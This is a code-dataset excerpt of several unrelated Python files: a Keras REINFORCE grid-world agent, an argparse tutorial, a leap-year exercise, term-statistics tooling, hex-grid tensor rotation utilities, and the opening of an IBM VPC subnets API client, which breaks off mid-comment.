1-grid-world/7-reinforce/reinforce_agent.py | smbatchouAI/reinforcement-learning-1 | 1 | 12760275 | import copy
import pylab
import numpy as np
from environment import Env
from keras.layers import Dense
from keras.optimizers import Adam
from keras.models import Sequential
from keras import backend as K
EPISODES = 2500
class ReinforceAgent:
    """REINFORCE (Monte-Carlo policy gradient) agent for the 5x3 grid world.

    Keeps a small softmax policy network (Keras) and trains it once per
    episode from the full trajectory of states, actions and rewards.
    """

    def __init__(self):
        self.render = False
        self.load_model = False
        # Five discrete actions (up/down/left/right/stay per the environment).
        self.action_space = [0, 1, 2, 3, 4]
        self.action_size = len(self.action_space)
        self.state_size = 15
        self.discount_factor = 0.99  # decay rate
        self.learning_rate = 0.001

        self.model = self.build_model()
        # NOTE(review): this assignment shadows the optimizer() method on the
        # instance — after __init__, self.optimizer is the compiled train
        # function, not the method. Works, but easy to trip over.
        self.optimizer = self.optimizer()
        # Per-episode trajectory buffers, cleared after each training step.
        self.states, self.actions, self.rewards = [], [], []

        if self.load_model:
            self.model.load_weights('./save_model/reinforce_trained.h5')

    def build_model(self):
        """Build the softmax policy network: 15 -> 24 -> 24 -> 5."""
        model = Sequential()
        model.add(Dense(24, input_dim=self.state_size, activation='relu'))
        model.add(Dense(24, activation='relu'))
        model.add(Dense(self.action_size, activation='softmax'))
        model.summary()
        return model

    def optimizer(self):
        """Compile the REINFORCE update: maximize log pi(a|s) * return."""
        action = K.placeholder(shape=[None, 5])
        discounted_rewards = K.placeholder(shape=[None, ])

        # Probability of the action that was actually taken (one-hot mask).
        good_prob = K.sum(action * self.model.output, axis=1)
        # Policy-gradient surrogate; rewards are treated as constants.
        eligibility = K.log(good_prob) * K.stop_gradient(discounted_rewards)
        loss = -K.sum(eligibility)

        optimizer = Adam(lr=self.learning_rate)
        updates = optimizer.get_updates(self.model.trainable_weights,[],
                                        loss)
        train = K.function([self.model.input, action, discounted_rewards], [],
                           updates=updates)

        return train

    def get_action(self, state):
        """Sample an action from the current policy distribution."""
        policy = self.model.predict(state)[0]
        return np.random.choice(self.action_size, 1, p=policy)[0]

    def discount_rewards(self, rewards):
        """Compute discounted returns, iterating the episode backwards."""
        # NOTE(review): np.zeros_like inherits the dtype of `rewards`; if the
        # environment ever returns integer rewards the discounted values
        # would be truncated — confirm reward dtype from Env.
        discounted_rewards = np.zeros_like(rewards)
        running_add = 0
        for t in reversed(range(0, len(rewards))):
            running_add = running_add * self.discount_factor + rewards[t]
            discounted_rewards[t] = running_add
        return discounted_rewards

    def remember_episode(self, state, action, reward):
        """Append one (state, one-hot action, reward) step to the buffers."""
        self.states.append(state[0])
        self.rewards.append(reward)
        act = np.zeros(self.action_size)
        act[action] = 1
        self.actions.append(act)

    def train_model(self):
        """Run one policy-gradient update from the stored episode."""
        discounted_rewards = np.float32(self.discount_rewards(self.rewards))
        # Standardize returns to reduce gradient variance.
        discounted_rewards -= np.mean(discounted_rewards)
        discounted_rewards /= np.std(discounted_rewards)

        self.optimizer([self.states, self.actions, discounted_rewards])
        self.states, self.actions, self.rewards = [], [], []
# Training driver: run EPISODES episodes, updating the policy at the end of
# each one (REINFORCE is a Monte-Carlo method) and checkpointing every 100.
if __name__ == "__main__":
    env = Env()
    agent = ReinforceAgent()

    global_step = 0
    scores, episodes = [], []

    for e in range(EPISODES):
        done = False
        score = 0
        # Fresh episode: reset the environment and get the initial state.
        state = env.reset()
        state = np.reshape(state, [1, 15])

        while not done:
            if agent.render:
                env.render()
            global_step += 1

            # Sample an action from the policy and advance the environment.
            action = agent.get_action(state)
            next_state, reward, done = env.step(action)
            next_state = np.reshape(next_state, [1, 15])

            agent.remember_episode(state, action, reward)
            score += reward
            state = copy.deepcopy(next_state)

            if done:
                # Episode finished: run the policy-gradient update.
                agent.train_model()
                scores.append(score)
                episodes.append(e)
                score = round(score,2)
                print("episode:", e, "  score:", score, "  time_step:",
                      global_step)

        # Periodic checkpoint of the learning curve and model weights.
        if e % 100 == 0:
            pylab.plot(episodes, scores, 'b')
            pylab.savefig("./save_graph/reinforce.png")
            agent.model.save_weights("./save_model/reinforce.h5")

        # Early stop after ~500 episodes despite EPISODES being larger.
        if e == 501:
            break

    print('game over')
    env.destroy()
| 2.390625 | 2 |
01/cli.py | hassaku63/argparse-get-started | 1 | 12760276 | <gh_stars>1-10
import argparse
def main():
    """Rewrite of tutorial 00 using argparse.

    Reference: https://docs.python.org/ja/3/howto/argparse.html
    """
    # Declare the parser and the single -m/--message option it accepts.
    parser = argparse.ArgumentParser(
        description="This is argparse tutorial - 01"
    )
    parser.add_argument(
        "-m", "--message",
        type=str,
        dest='msg',
        default='world',
        help="出力する文字列"
    )

    # Parse argv, then run the actual logic on the parsed value.
    args = parser.parse_args()
    print(f'hello, {args.msg.upper()}')
# Script entry point.
if __name__ == '__main__':
    main()
exercicios/Curso_em_video/ex032.py | IgoPereiraBarros/maratona-data-science-brasil | 0 | 12760277 | <reponame>IgoPereiraBarros/maratona-data-science-brasil
from datetime import date
from time import sleep
# Prompt for a year; 0 means "check the current year".
ano = int(input('Digite um ano para verificar se é Bissexto ou não, ou 0(zero) para verificar o ano atual: '))
print('Verificando...')
# Purely cosmetic pause to simulate "checking".
sleep(3)
if ano == 0:
    ano = date.today().year
# Gregorian leap-year rule: divisible by 4 and not by 100, or divisible by 400.
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
    print('O ano {} é Bissexto'.format(ano))
else:
    print('O ano {} não é Bissexto'.format(ano))
| 3.71875 | 4 |
biotermhub/stats/statistics_termfile.py | OntoGene/BioTermHub_dockerized | 1 | 12760278 | <reponame>OntoGene/BioTermHub_dockerized
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: <NAME>, 2015
# Modified: <NAME>, 2016
"""
Calculate term synonymy and ambiguity statistics.
"""
from collections import Counter, defaultdict
import csv
import re
from termhub.lib.tools import TSVDialect
class StatsCollector(object):
    '''
    Collector for ambiguity and synonymy statistics.

    One collector covers one group of entries (eg. one resource or one
    entity type); feed it (id, term) pairs via update().
    '''
    def __init__(self, label, name):
        # label: what kind of grouping this is; name: the concrete group.
        self.label = label # eg. "Resource", "Entity Type"
        self.name = name
        self.terms = Counter()
        # counts number of occurrences of term
        # Key: term, Value: count
        # included: calculate total number of terms (types) = length of terms
        self.synonyms = defaultdict(set)
        # counts number of synonyms for each id
        # Key: ID, Value: set of terms
        self.ambiguous_terms = defaultdict(set)
        # counts ids per term type (how many different ids are associated with
        # one term (types)?)
        # Key: term, Value: set of ids
        self.ambiguous_terms_lower = defaultdict(set)
        # counts number of ids per term (unique) with all terms lowercased
        # Key: Term, Value: set of ids
        self.ambiguous_terms_nows = defaultdict(set)
        # counts number of ids per terms (unique) with all terms lowercased
        # and all non-alphanumeric chars removed
        # Key: Term, Value: set of ids

    @property
    def ids(self):
        'Set of all IDs.'
        return set().union(*self.ambiguous_terms.values())

    @classmethod
    def strip_symbols(cls, term):
        '''
        Remove non-alphanumeric characters.
        '''
        return cls.nonalnum.sub('', term)
    # Matches runs of non-alphanumerics; underscore is explicitly included.
    nonalnum = re.compile(r'[\W_]+')

    def update(self, id_, term):
        '''
        Update all counters with this entry.
        '''
        term_lw = term.lower()
        term_nws = self.strip_symbols(term_lw)
        self.terms[term] += 1
        self.ambiguous_terms[term].add(id_)
        self.ambiguous_terms_lower[term_lw].add(id_)
        self.ambiguous_terms_nows[term_nws].add(id_)
        self.synonyms[id_].add(term)

    def term_length_avg(self):
        '''
        Get the average term length.
        '''
        # Averages over unique terms (types), not occurrences (tokens).
        total_length = sum(len(term) for term in self.terms)
        avg = total_length / len(self.terms)
        return avg

    def id_freq_dist(self):
        'Terms per ID (synonymy).'
        return freq_dist(self.synonyms)

    def term_freq_dist(self):
        'IDs per term (ambiguity).'
        return freq_dist(self.ambiguous_terms)

    def term_lw_freq_dist(self):
        'IDs per lower-cased term (case-insensitive ambiguity).'
        return freq_dist(self.ambiguous_terms_lower)

    def term_lw_nows_freq_dist(self):
        'IDs per lower-cased, alphanumeric-only term (normalised ambiguity).'
        return freq_dist(self.ambiguous_terms_nows)

    def display_stats(self):
        '''
        Dump a textual description to STDOUT.
        '''
        print('\n')
        print(self.label, 'statistics for', self.name)
        print('Number of original IDs:', len(self.ids))
        print('Number or original terms:', len(self.terms))
        print('Average of IDs associated to one term ("ambiguous terms"):',
              average(self.ambiguous_terms))
        print('Average of Terms associated to one ID ("synonyms"):',
              average(self.synonyms))
        print('FREQ DIST number of terms per id', self.id_freq_dist())
        print('FREQ DIST number of ids per term', self.term_freq_dist())
        print('FREQ DIST number of ids per lower-cased term',
              self.term_lw_freq_dist())
        print('FREQ DIST number or ids per lower-cased term with '
              'non-alphanumeric characters removed',
              self.term_lw_nows_freq_dist())
        print('AVG Token Lenght', self.term_length_avg())
class OverallStats(StatsCollector):
    '''
    Collector for the whole combined resource.

    Aggregates global statistics over every entry and maintains one
    subordinate StatsCollector per group (eg. per resource and per
    entity type) seen in the input.
    '''
    def __init__(self, label=None, name=None):
        super().__init__(label, name)
        # Total number of entries in the whole term file (tokens).
        self.all_lines_counter = 0
        # Nested mapping: group label (eg. "Resource") -> name -> collector.
        self.substats = defaultdict(dict)

    def update(self, id_, term, **kwargs):
        '''
        Update global and per-group counters with one entry.

        Keyword arguments name the groupings, eg. Resource='MeSH'.
        '''
        self.all_lines_counter += 1
        # Update subordinate stats.
        for label, name in kwargs.items():
            if name not in self.substats[label]:
                self.substats[label][name] = StatsCollector(label, name)
            self.substats[label][name].update(id_, term)
        # Update global stats.
        super().update(id_, term)

    def display_stats(self):
        '''
        Dump a textual description to STDOUT.
        '''
        print('\n')
        print('STATS FOR WHOLE TERM FILE')
        print('Number of lines/terms:', self.all_lines_counter)
        print('Substats:')
        # Bug fix: iterate .items(), not .values() — unpacking the inner
        # dicts yielded by .values() into (label, names) raised at runtime.
        for label, names in self.substats.items():
            print('  {}:'.format(label), ', '.join(names))
        print('Total number of unique terms (types) in the term file:',
              len(self.terms))
        print('Average of tokens per type:', average(self.terms))
        print('Average of ids per term:', average(self.ambiguous_terms))
        print('Average of ids per term with lowercased terms:',
              average(self.ambiguous_terms_lower))
        print('Average of ids per term with lowercased terms and non-'
              'alphabetical characters removed:',
              average(self.ambiguous_terms_nows))
        print('FREQ DIST number of terms per id', self.id_freq_dist())
        print('FREQ DIST number of ids per term', self.term_freq_dist())
        print('FREQ DIST number of ids per term (terms are lowercased)',
              self.term_lw_freq_dist())
        print('FREQ DIST number of ids per term (terms are lowercased and '
              'symbols are removed', self.term_lw_nows_freq_dist())
        print('AVG Token Lenght', self.term_length_avg())

        # Bug fix: same .values() -> .items() correction as above.
        for label, names in self.substats.items():
            print('-----------')
            print(label, 'stats')
            for substats in names.values():
                substats.display_stats()
def freq_dist(coll):
    '''
    Frequency distribution: how many entries have a value of each size.
    '''
    sizes = (len(members) for members in coll.values())
    return Counter(sizes)
def average(coll):
    '''
    Compute mean of coll's values, or mean length when they aren't numbers.
    '''
    values = coll.values()
    try:
        total = sum(values)
    except TypeError:
        # Values are containers (eg. sets of IDs): average their sizes.
        total = sum(len(v) for v in values)
    return total / len(coll)
def process_file(csv_file):
    '''
    Read a TSV term file and aggregate statistics over it.

    Each row is read with DictReader (headers are used as keys) and must
    provide the columns original_id, term, resource and entity_type.

    Returns an OverallStats instance covering the whole file.
    '''
    # Generate proper header from first line
    with open(csv_file, 'r') as infile:
        reader = csv.DictReader(infile, dialect=TSVDialect)
        overall_stats = OverallStats()
        for row in reader:
            overall_stats.update(row['original_id'],
                                 row['term'],
                                 Resource=row['resource'],
                                 Entity_Type=row['entity_type'])
    return overall_stats
| 2.453125 | 2 |
model/utilities/hex_util.py | lil-lab/cerealbar_generation | 0 | 12760279 | """Various utilities dealing with hex coordinates mapping onto tensors representing the environment.
See: https://arxiv.org/pdf/1803.02108.pdf
Authors: <NAME> and <NAME>
"""
import os
import time
import math
from dataclasses import dataclass
import torch
from agent.environment import position
from ..map_transformations import pose
from .. import util
from typing import Tuple
@dataclass
class AxialPosition:
    """Hex position in axial coordinates: u is the axis index, v the row."""
    # Axis indices
    u: int
    # Row indices
    v: int

    def __str__(self):
        return f'{self.u}, {self.v}'

    def __hash__(self):
        # Hash like the (u, v) tuple so equal positions hash equally.
        return hash((self.u, self.v))
@dataclass
class CubePosition:
    """Hex position in cube coordinates."""
    # For valid hex positions the three components satisfy x + y + z == 0
    # (see axial_position_to_cube below, which constructs them that way).
    x: int
    y: int
    z: int
def offset_position_to_axial(offset_position: position.Position, add_u: int = 0, add_v: int = 0) -> AxialPosition:
    """Converts from offset coordinates to axial coordinates.

    Inputs:
        offset_position: Position in offset coordinates.
        add_u, add_v: constants added to keep the axial indices non-negative.
    """
    # Rows are shared between the two systems; only the column shifts.
    axis_index = offset_position.x - offset_position.y // 2
    row_index = offset_position.y
    return AxialPosition(axis_index + add_u, row_index + add_v)
def axial_position_to_offset(axial_position: AxialPosition, max_y: int = 0) -> position.Position:
    """Converts from axial back to offset coordinates.

    Inputs:
        axial_position: Position in axial coordinates.
        max_y: undoes the non-negativity shift applied when the axial
            coordinate was created (see offset_position_to_axial).
    """
    u, v = axial_position.u, axial_position.v
    return position.Position(u + v // 2 - max_y // 2, v)
def axial_position_to_cube(axial_position: AxialPosition) -> CubePosition:
    """Converts axial (u, v) to cube (x, y, z) coordinates."""
    u, v = axial_position.u, axial_position.v
    # x = v and z = u; y balances the x + y + z == 0 invariant.
    return CubePosition(v, -(u + v), u)
def cube_position_to_axial(cube_position: CubePosition) -> AxialPosition:
    """Converts cube (x, y, z) back to axial (u, v) coordinates."""
    # u = z and v = x; y is redundant given the cube invariant.
    return AxialPosition(cube_position.z, cube_position.x)
def rotate_counterclockwise(axial_position: AxialPosition, u_offset: int = 0, v_offset: int = 0) -> AxialPosition:
    """Rotates a hex position by one rotation step about (u_offset, v_offset).

    Implemented via the cube-coordinate negate-and-cycle identity
    (x, y, z) -> (-z, -x, -y); presumably one 60-degree counterclockwise
    step, as the name says — confirm orientation against the environment.
    """
    # Translate so the rotation center sits at the origin.
    centered = AxialPosition(axial_position.u - u_offset, axial_position.v - v_offset)
    cube = axial_position_to_cube(centered)
    rotated = cube_position_to_axial(CubePosition(-cube.z, -cube.x, -cube.y))
    # Translate back to the original frame.
    return AxialPosition(rotated.u + u_offset, rotated.v + v_offset)
def _get_batch_index_tensor(batch_size: int, env_height: int, env_width: int):
    """Return a (batch_size, env_height, env_width) int64 tensor where every
    cell of slice b holds the value b (a batch index for advanced indexing)."""
    # Idiom fix: torch.arange replaces the list-comprehension round trip
    # through Python ints; same values, same int64 dtype.
    index_array = torch.arange(batch_size)
    index_tensor = index_array.repeat(env_height, env_width, 1)
    return index_tensor.permute(2, 0, 1).long().detach().to(util.DEVICE)
def _get_offset_index_tensor(env_height: int, env_width: int) -> torch.Tensor:
    """Index tensor of offset (q, r) coordinates for every map cell.

    NOTE(review): the comment below says H x W x 2, but torch.meshgrid
    returns tensors shaped (len(first), len(second)), so this actually
    produces (env_width, env_height, 2). The two only agree for square
    environments — confirm the intended orientation for non-square maps.
    """
    # Create a H x W x 2 matrix
    q_col_indices = torch.linspace(0, env_width - 1, env_width)
    r_row_indices = torch.linspace(0, env_height - 1, env_height)
    q_cols, r_rows = torch.meshgrid([q_col_indices, r_row_indices])
    return torch.stack((q_cols, r_rows)).permute(1, 2, 0).long().detach().to(util.DEVICE)
def _get_batched_offset_index_tensor(batch_size: int, env_height: int, env_width: int) -> torch.Tensor:
    """The offset index tensor replicated along a leading batch dimension."""
    # Batch size could include the channel dimension.
    single_map = _get_offset_index_tensor(env_height, env_width)
    batched = single_map.unsqueeze(0).repeat(batch_size, 1, 1, 1)
    return batched.detach().to(util.DEVICE)
def _get_axial_index_tensor(offset_index_tensor: torch.Tensor,
add_u: int = 0, add_v: int = 0) -> torch.Tensor:
# The offset index tensor is assumed to be of size B x H x W x 2, where B is the batch size (or batch size x
# channel dimension).
if offset_index_tensor.size(3) != 2:
raise ValueError('Offset index tensor should have size B x H x W x 2: %s' % offset_index_tensor.size())
# v is just the same as r.
v = offset_index_tensor[:, :, :, 1]
# u is the axis index. It is q - r // 2.
u = offset_index_tensor[:, :, :, 0] - v // 2
# Add the offsets.
u += add_u
v += add_v
if (u < 0).any():
print(u)
raise ValueError('Axial index tensor has u negative values. Perhaps you need to add u.')
if (v < 0).any():
print(v)
raise ValueError('Axial index tensor has v negative values. Perhaps you need to add v.')
return torch.stack((u, v)).permute(1, 2, 3, 0).long()
def _get_cube_index_tensor(axial_index_tensor: torch.Tensor,
add_u: int = 0, add_v: int = 0) -> torch.Tensor:
# The offset index tensor is assumed to be of size B x H x W x 2, where B is the batch size (or batch size x
# channel dimension).
if axial_index_tensor.size(3) != 2:
raise ValueError('Axial index tensor should have size B x H x W x 2: %s' % axial_index_tensor.size())
u = axial_index_tensor[:, :, :, 0]
v = axial_index_tensor[:, :, :, 1]
# x is just the same as v.
x = v
# y is -(u + v).
y = -(u + v)
# z is just the same as u.
z = u
return torch.stack((x, y, z)).permute(1, 2, 3, 0).long()
def _get_offset_axial_indices(batch_size: int, height: int, width: int,
                              additional_size: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]:
    """Return flattened (qs, rs, us, vs) vectors pairing each offset cell with its axial cell.

    additional_size is added to u so that all axial indices are non-negative.
    """
    offsets = _get_batched_offset_index_tensor(batch_size, height, width)
    axials = _get_axial_index_tensor(offsets, add_u=additional_size)
    return (offsets[:, :, :, 0].flatten(), offsets[:, :, :, 1].flatten(),
            axials[:, :, :, 0].flatten(), axials[:, :, :, 1].flatten())
def _get_axial_cube_index_tensors(batch_size: int, height: int, width: int,
                                  additional_size: int) -> Tuple[torch.Tensor, torch.Tensor]:
    """Return (axial, cube) index grids where axial = pixel coordinate minus the center offset."""
    axial = _get_batched_offset_index_tensor(batch_size, height, width) - additional_size
    return axial, _get_cube_index_tensor(axial)
def _pad_axial_to_square(input_tensor: torch.Tensor, offset: torch.Tensor) -> torch.Tensor:
    """Pads an input axial tensor to a square such that the position (0, 0) is in the center of the new square
    tensor.

    Args:
        input_tensor: B x C x H x W axial tensor to embed.
        offset: B x 2 tensor of per-batch (q, r) offset coordinates; the cell at
            this offset ends up at the center of the padded square.

    Returns:
        (placeholder, mask): the padded B x C x (2H+1) x (2H+1) tensor and a
        B x (2H+1) x (2H+1) boolean mask marking the embedded (valid) region.
        NOTE(review): the return annotation says a single tensor, but a
        (tensor, mask) pair is returned.
    """
    batch_size, num_channels, axial_height, axial_width = input_tensor.size()
    placeholder = torch.zeros((batch_size, num_channels, axial_height * 2 + 1, axial_height * 2 + 1)).to(util.DEVICE)
    pose_batch_size, pose_coord_size = offset.size()
    if pose_batch_size != batch_size:
        raise ValueError('Batch size of pose and input tensor are not the same: %s vs. %s' % (pose_batch_size,
                                                                                              batch_size))
    if pose_coord_size != 2:
        raise ValueError('Pose must have 2 coordinates; has %s' % pose_coord_size)
    # Need to get the us, vs for the offset. Offset is in offset coordinates, not axial coordinates.
    # Pose has 0th index of q, and 1th index of r.
    additional_size = axial_height - axial_width
    qs = offset[:, 0]
    rs = offset[:, 1]
    us = qs - rs // 2
    # Top-left corner of the embedded region, chosen so the pose cell lands at the center.
    u_min = axial_height - additional_size - us
    u_max = u_min + axial_height
    v_min = axial_height - rs
    v_max = v_min + axial_width
    # TODO: maybe remove for loops
    # Not sure which is faster 1. loop of contiguous memory assignments (i.e., square region to square region mapping)
    # vs 2. one-time non-contiguous memory assignments (i.e., individual indices to indices mapping)
    for b in range(batch_size):
        placeholder[b, :, u_min[b]:u_max[b], v_min[b]:v_max[b]] = input_tensor[b,:,:,:]
    # Create a mask for the non-padded region of axial tensor and move the mask to the coordinates of the placeholder
    # If you don't create a mask, some of pixels will be outside of the placeholder after rotation
    mask = torch.zeros((batch_size, axial_height * 2 + 1, axial_height * 2 + 1))
    additional_size = (axial_width - 1) // 2
    _, _, us, vs = _get_offset_axial_indices(batch_size, axial_width, axial_width, additional_size)
    # TODO: maybe remove for loops
    # Not sure which is faster 1. loop of contiguous memory assignments (i.e., square region to square region mapping)
    # vs 2. one-time non-contiguous memory assignments (i.e., individual indices to indices mapping)
    for b in range(batch_size):
        m_us, m_vs = us + u_min[b], vs + v_min[b]
        mask[b, m_us, m_vs] = 1
    mask = mask.bool()
    return placeholder, mask
def _get_cube_rotation_matrix(rots):
    """Build one 3x3 cube-coordinate rotation matrix per angle in *rots* (radians, multiples of 60 degrees)."""
    assert len(rots.size()) == 1, 'Rotation is an one-dimensional tensor: %s' % rots.size()
    # One 60-degree rotation step in cube coordinates: x <- -y, y <- -z, z <- -x.
    step = torch.zeros((3, 3))
    step[0, 2] = -1
    step[1, 0] = -1
    step[2, 1] = -1
    out = torch.zeros((rots.size(0), 3, 3))
    # TODO: Make this loop a simple six-way look-up table.
    for idx, angle in enumerate(rots):
        acc = torch.eye(3)
        num_steps = (angle // math.radians(60)).long() % 6
        for _ in range(num_steps):
            acc = torch.matmul(acc, step)
        out[idx, :, :] = acc
    return out.detach().to(util.DEVICE)
def _rotate_cube_indices(cube_index_tensor: torch.Tensor, rots: torch.Tensor):
    """Rotate per-pixel cube indices (B x H x W x 3) by the per-batch angles in *rots*."""
    batch_size, height, width, channels = cube_index_tensor.size()
    assert channels == 3, 'Tensor does not have 3 channels: %s' % channels
    rot_mats = _get_cube_rotation_matrix(rots)
    # Flatten the spatial grid so each batch item is a 3 x (H*W) coordinate matrix.
    coords = cube_index_tensor.permute(0, 3, 1, 2).reshape(batch_size, channels, height * width).float()
    rotated = torch.bmm(rot_mats, coords)
    rotated = rotated.reshape(batch_size, channels, height, width).permute(0, 2, 3, 1)
    return rotated.long()
def offset_tensor_to_axial(input_tensor: torch.Tensor) -> torch.Tensor:
    """Transforms a tensor representing offset hex representation of an environment to axial coordinates.

    Inputs:
        input_tensor: The input tensor. Should be a square tensor with size B x C x H x W, where H = W.
    """
    batch_size, num_channels, env_height, env_width = input_tensor.size()
    assert env_width == env_height, 'Tensor is not square: %s x %s' % (env_width, env_height)
    # The axial layout needs extra rows because u = q - r // 2 shifts columns.
    extra = (env_width - 1) // 2
    axial_height = env_width + extra
    flat_batch = batch_size * num_channels
    out = torch.zeros((flat_batch, axial_height, env_width)).detach().to(util.DEVICE)
    qs, rs, us, vs = _get_offset_axial_indices(flat_batch, env_height, env_width, extra)
    out[:, us, vs] = input_tensor.view(flat_batch, env_height, env_width)[:, qs, rs]
    return out.view(batch_size, num_channels, axial_height, env_width)
def axial_tensor_to_offset(axial_tensor: torch.Tensor) -> torch.Tensor:
    """Inverse of offset_tensor_to_axial: collapse a B x C x H x W axial tensor
    (H > W) back into a square B x C x W x W offset tensor."""
    batch_size, num_channels, tensor_height, tensor_width = axial_tensor.size()
    env_height = env_width = tensor_width
    assert tensor_height > tensor_width, 'Axial tensor does not have a valid shape: %s x %s' % (env_width, env_height)
    extra = tensor_height - tensor_width
    flat_batch = batch_size * num_channels
    out = torch.zeros((flat_batch, env_width, env_width)).detach().to(util.DEVICE)
    qs, rs, us, vs = _get_offset_axial_indices(flat_batch, env_height, env_width, extra)
    out[:, qs, rs] = axial_tensor.view(flat_batch, tensor_height, tensor_width)[:, us, vs]
    return out.view(batch_size, num_channels, env_height, env_width)
def translate_and_rotate(axial_tensor: torch.Tensor, target_poses: pose.Pose, is_axial_coord: bool = False) -> torch.Tensor:
    """Center an axial tensor on the pose position and rotate it by the pose orientation.

    Args:
        axial_tensor: B x C x H x W axial tensor (not square).
        target_poses: poses whose .position (offset coordinates) is moved to the
            center and whose .orientation (radians) rotates the map.
        is_axial_coord: if True, the valid-region mask is reset to the central
            W x W square (input assumed already axially centered).

    Returns:
        A square B x C x H' x W' tensor, H' = W' = 2H + 1.
    """
    padded_tensor, mask = _pad_axial_to_square(axial_tensor, offset=target_poses.position)
    if is_axial_coord:
        # Restrict the mask to the central W x W square of the padded map.
        center = padded_tensor.shape[-1] // 2
        slack = axial_tensor.shape[-1] // 2
        offset = center - slack
        end = center + slack + 1
        mask[:, :, :] = False
        mask[:, offset:end, offset:end] = True
    else:
        pass
    # Get padded placeholder and the axial and cube index of each pixel location.
    placeholder = torch.zeros(padded_tensor.shape).to(util.DEVICE)
    center = padded_tensor.size(2) // 2
    batch_size, _, height, width = padded_tensor.shape
    axial_index_tensor, cube_index_tensor = _get_axial_cube_index_tensors(batch_size, height,
                                                                          width,
                                                                          additional_size=center)
    # Rotate tensors clockwise by angles specified by target_poses.orientation.
    cube_index_tensor_rot = _rotate_cube_indices(cube_index_tensor, rots=target_poses.orientation)  # only unique by rotation
    bs = _get_batch_index_tensor(batch_size, height, width)
    # Source (unrotated) and destination (rotated) coordinates, shifted to be non-negative.
    us, vs = axial_index_tensor[:, :, :, 0] + center, axial_index_tensor[:, :, :, 1] + center
    us_rot, vs_rot = cube_index_tensor_rot[:, :, :, 2] + center, cube_index_tensor_rot[:, :, :, 0] + center
    # Scatter only the valid (masked) cells into their rotated positions.
    bs, us, vs, us_rot, vs_rot = bs[mask], us[mask], vs[mask], us_rot[mask], vs_rot[mask]
    indexed_padded = padded_tensor[bs, :, us, vs]
    placeholder[bs, :, us_rot, vs_rot] = indexed_padded
    return placeholder
def untransate_and_unrotate(input_tensor: torch.Tensor, source_poses: pose.Pose) -> torch.Tensor:
    """Intended inverse of translate_and_rotate — NOT IMPLEMENTED (returns None).

    NOTE(review): the name contains a typo ('untransate'); keep until call
    sites can be updated together.
    """
    # Input tensor should be square: B x C x H' x W' where H' = W' = some function of W.
    # Should return an axial tensor (not square).
    pass
class Hex_Rotator():
    """
    Speed up translation and rotation if the local map size is fixed.

    Precomputes the valid-region mask, the axial index grid, and all six
    60-degree rotated cube index grids for an 11 x 11 padded map holding a
    5 x 5 local crop.
    """

    def __init__(self):
        # hyperparam: center pixel of the 11 x 11 padded map
        self._center = 5
        # mask marking the valid region inside the padded map
        self._mask = torch.zeros((1, 11, 11))
        _, _, us, vs = _get_offset_axial_indices(1, 5, 5, 2)
        m_us, m_vs = us + 3, vs + 3
        self._mask[:, m_us, m_vs] = 1
        self._mask = self._mask.bool()
        # NOTE(review): the mask computed above is immediately overwritten with
        # the plain central 5 x 5 square below — confirm which one is intended.
        self._mask[:, :, :] = False
        self._mask[:, 3:8, 3:8] = True
        # precompute get_axial_cube_index_tensors and all six rotations
        self._axial_index_tensor, cube_index_tensor = _get_axial_cube_index_tensors(1, 11, 11, additional_size=5)
        cube_index_tensor = torch.cat([cube_index_tensor for _ in range(6)], 0)
        self._cube_index_tensor_rots = _rotate_cube_indices(cube_index_tensor, rots=torch.tensor([i * math.radians(60) for i in range(6)]).to(util.DEVICE))  # unique by rotation
        self._us, self._vs = self._axial_index_tensor[:, :, :, 0] + self._center, self._axial_index_tensor[:, :, :, 1] + self._center

    def translate_and_rotate(self, axial_tensor: torch.Tensor, target_poses: pose.Pose):
        """Rotate a batch of fixed-size local maps by the per-batch pose orientations."""
        # pad tensor
        batch_size, _, _, _ = axial_tensor.shape
        placeholder = torch.zeros(axial_tensor.shape).to(util.DEVICE).type(axial_tensor.type())  #! still the largest bottleneck
        height, width = 11, 11
        # stack mask for the whole batch
        mask = torch.cat([self._mask for _ in range(batch_size)], 0)
        # get batch index tensor
        bs = _get_batch_index_tensor(batch_size, height, width)
        bs = bs[mask]
        # stack us and vs
        us = torch.cat([self._us for _ in range(batch_size)], 0)
        vs = torch.cat([self._vs for _ in range(batch_size)], 0)
        us, vs = us[mask], vs[mask]
        # look up the precomputed rotation grid for each orientation (multiples of 60 degrees)
        cube_index_tensor_rot = []
        cube_index_tensor_rot = torch.stack([self._cube_index_tensor_rots[o, ...] for o in (target_poses.orientation / math.radians(60)).long()], 0)
        us_rot, vs_rot = cube_index_tensor_rot[:, :, :, 2] + self._center, cube_index_tensor_rot[:, :, :, 0] + self._center
        us_rot, vs_rot = us_rot[mask], vs_rot[mask]
        # remove indices whose rotated position falls outside the 5 x 5 crop
        keep = (us_rot >= 3) & (us_rot <= 7) & (vs_rot >= 3) & (vs_rot <= 7)
        bs = bs[keep]
        us = us[keep]
        vs = vs[keep]
        us -= 3
        vs -= 3
        us_rot = us_rot[keep]
        vs_rot = vs_rot[keep]
        us_rot -= 3
        vs_rot -= 3
        # detach values
        # NOTE(review): Tensor.detach() is not in-place; these calls have no
        # effect — confirm whether re-binding (x = x.detach()) was intended.
        bs.detach()
        us.detach()
        vs.detach()
        us_rot.detach()
        vs_rot.detach()
        # scatter the kept cells into their rotated positions and return
        indexed_padded = axial_tensor[bs, :, us, vs]
        placeholder[bs, :, us_rot, vs_rot] = indexed_padded
        return placeholder

    """
    def _pad_axial_to_square(self, input_tensor: torch.Tensor) -> torch.Tensor:
        batch_size, num_channels, axial_height, axial_width = input_tensor.size()
        placeholder = torch.zeros((batch_size, num_channels, axial_height * 2 + 1, axial_height * 2 + 1)).to(util.DEVICE)
        placeholder[:, :, 3:8, 3:8] = input_tensor
        return placeholder
    """
Python/subnets.py | kparr/vpc-api-samples | 5 | 12760280 | import http.client
import json
from config import conn, headers, version, print_json
# Fetch all Subnets
# Spec: https://pages.github.ibm.com/riaas/api-spec/spec_2019-05-07/#/Subnets/list_subnets
def fetch_subnets():
    """GET every subnet from the VPC API, pretty-print it, and return the raw JSON body as a string."""
    payload = ""
    try:
        # Issue the request against the subnets endpoint.
        conn.request("GET", "/v1/subnets?version=" + version, payload, headers)
        response = conn.getresponse()
        body = response.read().decode("utf-8")
        # Pretty-print for the caller before handing the body back.
        print_json(body)
        return body
    except Exception as error:
        print(f"Error fetching subnets. {error}")
        raise
# Create Subnet
# Spec: https://pages.github.ibm.com/riaas/api-spec/spec_2019-05-07/#/Subnets/create_subnet
# Params:
#   name: str
